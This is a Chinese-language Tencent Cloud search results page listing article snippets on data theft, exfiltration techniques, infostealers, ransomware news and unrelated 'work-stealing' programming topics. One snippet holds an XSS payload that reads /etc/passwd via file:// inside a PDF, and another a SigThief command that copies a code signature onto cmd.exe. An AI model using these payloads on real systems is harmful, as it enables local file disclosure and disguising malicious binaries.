- 综合排序
- 最热优先
- 最新优先
- 来自专栏Khan安全团队
XSS 从 PDF 中窃取数据
<script>x=newXMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>
33910编辑于 2025-04-28 - 来自专栏betasec
凭证窃取 | Xshell凭证窃取
本节小编将给大家介绍Xshell工具的凭证窃取方式,对于Xshell工具相信大家并不陌生,很多开发或者运维人员使用xshell连接远程的服务端,用于远程的配置和管理服务器。 相对于其它的远程连接工具Xshell算是相对安全的,因为该工具存储的账号密码使用过RC4加密的,但是当攻击者通过xx方式获取到目标主机的控制权限时,xshell端加密保存的数据也变得不安全了。
1.3K40编辑于 2022-12-11 - 来自专栏网络安全
攻防实战:数据窃取技术详解
一、概述(Overview)数据窃取是指未经授权地、隐蔽地将敏感数据从受控的内部网络复制并转移到攻击者控制的外部位置的过程。 网络犯罪分子攻击公司的目的各异,但多数情况下最终目标是数据泄露,即将窃取的敏感数据在暗网出售或公开。 二、数据窃取的核心用途(CoreUseCasesofDataExfiltration)直接窃取数据(DirectDataTheft/TraditionalExfiltration):-**场景**:将收集到的敏感数据从组织网络单向移出到攻击者控制的服务器 通常涉及持续的数据发送和接收。三、基于常见网络协议的数据窃取技术#####A.TCP套接字窃取(TCPSocketExfiltration)原理与适用场景:直接利用TCP套接字建立连接并传输数据。 DNS数据窃取(DNSDataExfiltration)DNS数据窃取是一种将敏感数据编码后,通过一系列DNS查询发送到攻击者控制的DNS服务器的网络攻击。
56341编辑于 2025-12-31 - 来自专栏闪石星曜CyberSecurity
佳能遭严重勒索软件攻击,10TB数据被窃取,大量服务宕机
Garmin 遭勒索攻击的风波未平,近日,佳能又遭受了勒索软件攻击,攻击除了让佳能的一些网站宕机外,据说还导致佳能服务器中高达 10TB 的数据被盗。 BleepingComputer(以下称我们)一直在关注佳能公司出现的问题,佳能云照片和视频存储服务出现数据泄露,这两个服务为用户免费提供10GB存储功能。 但是,该网站最后显示的状态,因为虽然提到了出现数据丢失,但并没有图像数据泄漏的情况出现。 ? 当我们就这次故障联系佳能想要获取更多的信息时,而佳能并没有透露公告之外的消息。 有Maze声称已经窃取佳能10TB的数据 在我们与Maze取得联系后,Maze 表示攻击是在今天早上进行的,窃取了对方10TB的数据、私有云数据库等等,这些数据窃取是攻击行动的一部分成果。 如果受害者不支付赎金,Maze将创建一个数据泄露网站,并在该网站上公开发布窃取的文件。
46920发布于 2020-09-28 - 来自专栏FreeBuf
超过 10 万个 ChatGPT 账户被恶意软件窃取
Bleeping Computer 网站披露,国际网络安全公司 Group-IB 报告显示,暗网交易平台上正在出售超过 10 万名 ChatGPT 用户的个人信息。 这些类型的恶意软件通过从程序 SQLite 数据库中提取证书,并滥用 CryptProtectData 功能对存储的数据信息进行反向加密,从而窃取保存在网络浏览器中的凭证。 Group-IB 的数据显示,随着时间推移,被盗 ChatGPT 日志数量稳步增长,几乎 80% 的日志来自 Raccoon 窃取者,其次是 Vidar(13%)和 Redline(7%)。 被入侵的 ChatGPT 账户(Group-IB) 考虑到数据安全性,如果用户在 ChatGPT 上输入了敏感数据,请认真考虑在设置菜单中禁用聊天保存功能或在使用完工具后立即手动删除这些对话。 值得警惕的是,许多信息窃取者会对受感染的系统进行截图或进行键盘记录,因此即使不把对话保存到 ChatGPT 账户,恶意软件感染仍可能导致数据泄漏。
48640编辑于 2023-08-08 - 来自专栏全栈程序员必看
成果被他人窃取_工作窃取模式
大家好,又见面了,我是你们的朋友全栈君 什么是ForkJoin、ForkJoin分支合并、ForkJoin工作窃取、ForkJoin大数据求和计算 什么是ForkJoin? ForkJoin:分支合并 ForkJoin特点:工作窃取 如何让使用ForkJoin ForkJoin求和计算Demo 什么是ForkJoin? ForkJoin(分支合并)是jdk1.7之后出来的,并行执行任务,提高效率,用在大数据量场景下。 大数据:Map Reduce(把大任务拆分成多个小任务,怎么拆分用到了二分算法),每个小任务得出自己的结果,之后再把结果汇总,汇总的过程就是分支合并的思想。 ForkJoin特点:工作窃取 ForkJoin会把一个大任务分成若干个小任务去执行(任务是双端队列去存储的,两端都可以操作),然后再合并结果集。
54530编辑于 2022-09-30 - 来自专栏SimpleAI
【DL笔记10】迁移学习——光明正大“窃取”他人成果
但是,自己从0到1训练一个模型十分困难,主要在下面两个方面: 没有足够多的数据: 深度学习模型,最需要的就是大数据。没有大量的数据进行支撑,我们很难训练出一个理想的模型。 这种方法,一般用于我们自己也有大量的数据,这个时候,借用他人成功的网络结构和预训练参数,再充分利用自己的数据,就可以得到十分好的效果。 【我将数据集放在了百度云上,可至公众号后台回复“迁移学习数据集”获取数据集】 这个任务是不是看起来比之前的MNIST手写数字识别要难多了? ,本实验中,我们的数据是存在h5中,这种存储方式十分经济。 因此,我们用VGG来做迁移学习,显然是“杀鸡用牛刀”,所以我们简单地训练20来次,就可以达到很高的准确率,如果使用GPU的话,那10分钟的训练,估计准确率就可以接近100%了(我的猜测)。
1.4K30发布于 2018-10-25 - 来自专栏云头条
窃取结算密钥、编写非法结算程序,15 个月窃取 608 万:三人分别被判 11 年、10 年、缓刑
罗某某在工作期间发现PP租车公司与某支付机构之间的资金结算交易、对账系统存在管控漏洞,遂通过其窃取的PP租车公司与某支付机构的资金结算密钥,编写相应的非法结算程序密钥,冒充PP租车公司身份,向某支付机构发送资金结算请求 2015年5月至2016年2月期间,由罗某某制作后台程序,李某购买虚拟服务器、银行卡,并利用上述漏洞向某支付机构发送虚假的转账请求,分多次从PP租车公司窃取共计人民币3687948元;2016年3月至7 月期间,罗某某采用上述方法继续从PP租车公司窃取人民币2394014元,并指使庄某在本市多处的ATM取款机上取现共计人民币一百余万元。 这些账户都是其在网上论坛里买的,一共是10张银行卡,每张卡配1张身份证和1个U盾。 法院裁决: 罗某某单独或伙同李某以非法占有为目的,秘密窃取公司钱款,数额特别巨大,其二人的行为均已构成盗窃罪,应予惩处;庄某明知是犯罪所得而予以转移,情节严重,其行为已构成掩饰、隐瞒犯罪所得罪,应予惩处
75040编辑于 2022-03-18 - 来自专栏FreeBuf
防范数据窃取从了解其手法做起
数据窃取是针对组织攻击链中的最后一个阶段。攻击者窃取数据的技术可谓花样百出,网上也有大量关于数据窃取方面的技术文档以及工具。 工欲善其事必先利其器,防范数据窃取必须先熟悉其使用的手段。文中所提及的大多数技术涉及直接的内部到外部数据窃取。需要说明的是这并不是一个完整版本,如果你知道的更多,那么请在评论处留言并告知我们! Anon paste站点例如pastebin甚至是github,都为我们提供了一个数据窃取的简易通道。许多技术组织通常都会允许Github的使用。 文件类型 对于一些安装了DLP(数据泄露防护系统)的企业,我们可以尝试将数据封装在以下文件类型来绕过DLP: Zip 加密 (AES) Zip 深度嵌套 Zip(许多系统会在10-100层之后停止扫描, www.wired.com/2017/02/malware-sends-stolen-data-drone-just-pcs-blinking-led/ 磁:ODINI和MAGNETO攻击可以利用计算机处理器产生的磁信号来窃取数据
73530发布于 2018-08-21 - 来自专栏安恒网络空间安全讲武堂
用css绕过同源策略跨域窃取数据
font-family属性的值,即单引号内的,所 以这也将成为一个前置条件,那就是要窃取的数据中不能同时出现单双引号。 最后我们就 可以通过这样的方式完成跨域窃取敏感信息,数据甚至可能包含csrf所需的token,或者更敏感的个人信息。 攻击的一些前提约束 要窃取的数据必须在payload1和payload2之间。 要窃取的数据不能同时存在单引号和双引号,否则会破坏解析的结构。 (数据最后要被解析为css一个属性的值) 要窃取的数据不能包含换行符(css值不支持多行) 这些条件在现代的编码风格下是很难遇到,尤其是不允许出现换行。 我们需要一个可以写任意字符串的属性,这样才能导入我们要窃取的数据。”font-family”是最佳的选择。
1.5K90发布于 2018-02-06 - 来自专栏网络安全
DeepSeek 恶意 Python 包,正在窃取你的数据
研究人员发现,Python 软件包索引(PyPi)中植入了恶意的、模仿 DeepSeek 的软件包,这些代码实际上携带着信息窃取程序。 研究人员指出,“deepseeek” 和 “deepseekai” 在执行时会释放信息窃取程序,以窃取敏感数据,包括 API 密钥、数据库凭证和权限。
51910编辑于 2025-02-06 - 来自专栏安恒信息
IE10 0day漏洞被利用窃取军事情报
安全公司FireEye的研究人员发现了一个新的IE10 0day漏洞 (CVE-2014-0322) ,被攻击者利用发动偷渡下载攻击(Watering Hole),目标是窃取军事情报。 Veterans of Foreign Wars,VFW.org),在网站的HTML代码中加入了一个后台载入攻击者网页的内联框架(iframe),浏览器加载恶意代码后它会运行一个精心设计的Flash对象,利用IE10
67080发布于 2018-04-10 - 来自专栏子云笔记
窃取分析PE签名
Stealing Signatures and Making One Invalid Signature at a Time.https://github.com/secretsquirrel/SigThief从二进制文件中获取签名并将其添加到另一个二进制文件python sigthief.py -i 360.exe -t cmd.exe -o 361.exehttps://blog.didierstevens.com/programs/authenticode-tools/分析PESig是一种检查PE文件
69940编辑于 2022-09-13 - 来自专栏大数据文摘
“窃取用户数据”?看阿里如何应对
支付宝与付费通终止合作后,网上突然出现很多支付宝“窃取用户数据”的言论。商务合作终止固然遗憾,但“盗窃”的罪名更重大,尤其是涉及到大家非常关注的数据问题。 毫无疑问我们非常看重数据,数据将会成为改善全社会商业环境的重要资源,我们坚信数据的力量和价值。阿里巴巴从五年前就确定“开放的数据平台”作为自己的战略目标,并且重兵布局云计算和大数据。 基于这样的理解,我们认为数据的商业价值在于运用而不在控制,我们认为数据只有在交换、分享中才能发挥更大的价值,数据会越用价值越高。因此,我们并不担心获取数据的途径,更绝不会用不光彩的手段去获取数据! 如何有效地发挥这些数据的价值,建立一种数据交换以及数据标准的能力,我们的思考才刚刚开始。 4、大数据是无数用户的个体数据积累起来的,但看起来运用和发挥数据价值似乎变成了大机构的专利。这其中如何具体保护客户的隐私和利益?大数据对于每个人的价值又在哪里?
69950发布于 2018-05-21 - 来自专栏火绒安全
AgentTesla病毒解析:利用钓鱼邮件窃取终端隐私数据
当用户被诱导点击运行病毒后,病毒即会窃取用户终端上的隐私数据并上传C&C服务器。 ͼƬ2.png AgentTesla病毒样本通常使用混淆器,通过数据加密、代码加密、控制流混淆等多种混淆方式藏匿自身病毒特征,对抗安全软件查杀。 AgentTesla病毒的主要危害是窃取用户终端中的隐私数据,隐私数据包括用户浏览器登录凭证、FTP软件登录凭证、电子邮件登录凭证、键盘记录信息、屏幕截图、用户系统配置信息等。
73420编辑于 2022-05-20 - 来自专栏红队蓝军
域内令牌窃取
本文就通过令牌窃取进行研究,并希望知道其中的具体细节。 SystemHandleInformation 16 #define SystemHandleInformationSize 1024 * 1024 * 10
1.6K20编辑于 2023-02-25 - 来自专栏科学Sciences
科技骗局10:1967年贝尔发现脉冲星被导师窃取诺奖
10 | 1967年贝尔发现脉冲星被导师窃取诺奖 被遗忘的脉冲星发现者——诺贝尔委员会的性别歧视案。 1967年10月的一个夏日,剑桥大学射电天文台正在进行星空无线电信号流量变化研究,即射电闪烁,负责执行望远镜观测和数据分析的科研人员是乔瑟琳•贝尔 (Jocelyn Bell),一位来自爱尔兰的24岁女博士研究生 然而,进一步查找观测数据表明,这个脉冲信号的频率极其精确;接下来,贝尔和同事又发现不同天区的另外3个周期各异的脉冲信号源;所以这排除了外星人信号,因为不可能有三个“小绿人”在不同方向、同时向地球发射不同的脉冲信号 发射脉冲的持续时间大致是其周期的1/10至1/100。 3.密度大 密度一般用1立方厘米有多少克来表示,如果我们从脉冲星上面取下1立方厘米物质,称一下,它可重1亿吨以上、甚至达到10亿吨。 2017年10月10日,国家天文台召开发布会,宣布探测到数十个优质脉冲星候选体,其中6颗通过国际认证。
2.4K20发布于 2021-04-22 154个数据库被黑客窃取?ASML回应
该黑客声称,此次窃取的信息涵盖多类敏感数据,包括磁盘加密密钥、用户数据(用户名/密码)、软件信息以及特定设备的详细信息。 如果消息属实,这将远远超出一般的客户数据泄露事件,将会对ASML公司带来严重的负面影响。这意味着攻击者攻破了ASML的安全系统,并可以访问ASML公司高度敏感的数据。 不过,ASML在最新发布的声明中否认了公司遭黑客窃取数据的说法。 “ASML注意到2026年1月6日在BreachForums上发布的一篇帖子,该帖子声称公司信息被泄露。 所提及的文档中没有来自ASML的数据。”ASML在声明中写道。 第三方的安全研究团队经过分析后也认为,黑客“1011”兜售的所谓ASML的数据实际上毫无用处。 此外,研究人员还发现,黑客“1011”与本周早些时候宣布NordVPN数据泄露的攻击者是同一人。NordVPN公司随后也否认丢失任何数据,该公司代表称这些说法“不实”。
8510编辑于 2026-03-19浏览器“隐私”扩展被曝窃取AI对话数据
浏览器“隐私”扩展被曝窃取AI对话数据据Koi Security的研究报告,四款声称保护隐私的流行浏览器扩展程序实则背道而驰。 这些恶意插件一直在窃取超过800万用户的聊天机器人对话文本,并将其发送回开发者。 达迪克曼解释道,数据收集功能通过硬编码的配置标志默认启用。“没有面向用户的开关可以禁用此功能。停止数据收集的唯一方法是彻底卸载该扩展。” 他说,“要么是审核没有检查从某中心自家AI产品(Gemini)窃取对话的代码,要么是检查了但不认为这是个问题。” 该政策允许在有限场景(例如安全或业务所有权变更)下将数据传输给第三方,但这些场景不包括将数据传输给数据代理。
32110编辑于 2026-01-01- 来自专栏码匠的流水账
线程池工作窃取实例
ForkJoinPool主要用到的是双端队列,不过这里我们粗糙的实现的话,也可以不用到deque。
1.1K10发布于 2018-09-17
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号